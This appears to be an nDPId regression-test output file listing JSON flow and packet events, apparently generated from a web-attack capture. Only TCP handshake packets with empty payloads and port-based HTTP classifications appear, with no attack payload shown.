+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1469,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347142412,"flow_last_seen":1499347142412,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347142412,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54054,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1469,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":103,"flow_packet_id":1,"flow_last_seen":1499347142412,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347142412,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8YBRAAD4GZbysEAABwKgKMtMmAFBNdfKaAAAAAKACchC3tQAAAgQFtAQCCAoBOZKOAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1470,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":103,"flow_packet_id":2,"flow_last_seen":1499347142413,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347142413,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0yYb67mHTXXym6AScSB7OgAAAgQFtAQCCAoD42QEATmSjgEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1471,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":103,"flow_packet_id":3,"flow_last_seen":1499347142413,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347142413,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0YBVAAD4GZcOsEAABwKgKMtMmAFBNdfKbG+u5iIAQAOUaQgAAAQEICgE5ko4D42QE"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1484,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347143676,"flow_last_seen":1499347143676,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347143676,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54068,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1484,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":104,"flow_packet_id":1,"flow_last_seen":1499347143676,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347143676,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8BvpAAD4GvtasEAABwKgKMtM0AFB9ypUwAAAAAKACchDjgAAAAgQFtAQCCAoBOZPKAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1485,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":104,"flow_packet_id":2,"flow_last_seen":1499347143676,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347143676,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0zTpUSjmfcqVMaAScSBpBAAAAgQFtAQCCAoD42VAATmTygEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1486,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":104,"flow_packet_id":3,"flow_last_seen":1499347143677,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347143677,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0BvtAAD4Gvt2sEAABwKgKMtM0AFB9ypUx6VEo54AQAOUIDAAAAQEICgE5k8oD42VA"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1499,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347146267,"flow_last_seen":1499347146267,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347146267,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54094,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1499,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":105,"flow_packet_id":1,"flow_last_seen":1499347146267,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347146267,"pkt":"ABm5CmnxAMGxFOsxCABFAAA87ydAAD4G1qisEAABwKgKMtNOAFAXjXl1AAAAAKACchBi1wAAAgQFtAQCCAoBOZZSAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1500,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":105,"flow_packet_id":2,"flow_last_seen":1499347146268,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347146268,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ006ckw3VF415dqAScSBNogAAAgQFtAQCCAoD42fIATmWUgEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1501,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":105,"flow_packet_id":3,"flow_last_seen":1499347146268,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347146268,"pkt":"ABm5CmnxAMGxFOsxCABFAAA07yhAAD4G1q+sEAABwKgKMtNOAFAXjXl2nJMN1oAQAOXsqQAAAQEICgE5llID42fI"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1511,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347147523,"flow_last_seen":1499347147523,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347147523,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54108,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1511,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":106,"flow_packet_id":1,"flow_last_seen":1499347147523,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347147523,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8jHlAAD4GOVesEAABwKgKMtNcAFBPnRvyAAAAAKACchCHAwAAAgQFtAQCCAoBOZeLAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1512,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":106,"flow_packet_id":2,"flow_last_seen":1499347147523,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347147523,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ01w4IOWQT50b86AScSD9SwAAAgQFtAQCCAoD42kCATmXiwEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1513,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":106,"flow_packet_id":3,"flow_last_seen":1499347147524,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347147524,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0jHpAAD4GOV6sEAABwKgKMtNcAFBPnRvzOCDlkYAQAOWcUgAAAQEICgE5l4wD42kC"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1532,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347150236,"flow_last_seen":1499347150236,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347150236,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54134,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1532,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":107,"flow_packet_id":1,"flow_last_seen":1499347150236,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347150236,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8ESlAAD4GtKesEAABwKgKMtN2AFB3vosbAAAAAKACchDs9wAAAgQFtAQCCAoBOZoyAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1533,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":107,"flow_packet_id":2,"flow_last_seen":1499347150236,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347150236,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ03aiL1kKd76LHKAScSCDEQAAAgQFtAQCCAoD42uoATmaMgEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1534,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":107,"flow_packet_id":3,"flow_last_seen":1499347150237,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347150237,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0ESpAAD4GtK6sEAABwKgKMtN2AFB3voscoi9ZC4AQAOUiGQAAAQEICgE5mjID42uo"} +00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1538,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347024196,"flow_last_seen":1499347029616,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347150241,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52816,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1538,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347024196,"flow_last_seen":1499347029616,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347150241,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52816,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1538,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347015165,"flow_last_seen":1499347020614,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347150241,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52722,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1538,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347015165,"flow_last_seen":1499347020614,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347150241,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52722,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1538,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347016455,"flow_last_seen":1499347021614,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347150241,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52736,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1538,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347016455,"flow_last_seen":1499347021614,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347150241,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52736,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1538,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347017745,"flow_last_seen":1499347023616,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347150241,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52750,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1538,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347017745,"flow_last_seen":1499347023616,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347150241,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52750,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1538,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347020329,"flow_last_seen":1499347025616,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347150241,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52776,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1538,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347020329,"flow_last_seen":1499347025616,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347150241,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52776,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1538,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347021621,"flow_last_seen":1499347027616,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347150241,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52790,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1538,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347021621,"flow_last_seen":1499347027616,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347150241,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52790,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1541,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347151520,"flow_last_seen":1499347151520,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347151520,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54148,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1541,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":108,"flow_packet_id":1,"flow_last_seen":1499347151520,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347151520,"pkt":"ABm5CmnxAMGxFOsxCABFAAA82ilAAD4G66asEAABwKgKMtOEAFDVpkFaAAAAAKACchDXgQAAAgQFtAQCCAoBOZtzAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1542,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":108,"flow_packet_id":2,"flow_last_seen":1499347151520,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347151520,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ04RMTDZ61aZBW6AScSDkzQAAAgQFtAQCCAoD42zpATmbcwEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1543,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":108,"flow_packet_id":3,"flow_last_seen":1499347151521,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347151521,"pkt":"ABm5CmnxAMGxFOsxCABFAAA02ipAAD4G662sEAABwKgKMtOEAFDVpkFbTEw2e4AQAOWD1QAAAQEICgE5m3MD42zp"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1556,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347152786,"flow_last_seen":1499347152786,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347152786,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54162,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1556,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":109,"flow_packet_id":1,"flow_last_seen":1499347152786,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347152786,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8lJhAAD4GMTisEAABwKgKMtOSAFAXpgg3AAAAAKACchDNWwAAAgQFtAQCCAoBOZyvAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1557,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":109,"flow_packet_id":2,"flow_last_seen":1499347152786,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347152786,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ05Ji9R5fF6YIOKAScSDa3AAAAgQFtAQCCAoD424mATmcrwEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1558,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":109,"flow_packet_id":3,"flow_last_seen":1499347152787,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347152787,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0lJlAAD4GMT+sEAABwKgKMtOSAFAXpgg4YvUeYIAQAOV55AAAAQEICgE5nK8D424m"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1571,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347155346,"flow_last_seen":1499347155346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347155346,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54188,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1571,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":110,"flow_packet_id":1,"flow_last_seen":1499347155346,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347155346,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8btxAAD4GVvSsEAABwKgKMtOsAFCnAfHzAAAAAKACchBRqQAAAgQFtAQCCAoBOZ8vAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1572,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":110,"flow_packet_id":2,"flow_last_seen":1499347155346,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347155346,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ06xcmZfGpwHx9KAScSDpngAAAgQFtAQCCAoD43CmATmfLwEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1573,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":110,"flow_packet_id":3,"flow_last_seen":1499347155347,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347155347,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0bt1AAD4GVvusEAABwKgKMtOsAFCnAfH0XJmXx4AQAOWIpgAAAQEICgE5ny8D43Cm"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1583,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":111,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347156630,"flow_last_seen":1499347156630,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347156630,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54202,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1583,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":111,"flow_packet_id":1,"flow_last_seen":1499347156630,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347156630,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8OChAAD4GjaisEAABwKgKMtO6AFAdhZhYAAAAAKACchAzcgAAAgQFtAQCCAoBOaBwAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1584,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":111,"flow_packet_id":2,"flow_last_seen":1499347156630,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347156630,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ07o+DQO9HYWYWaAScSB8vAAAAgQFtAQCCAoD43HnATmgcAEDAwc="} 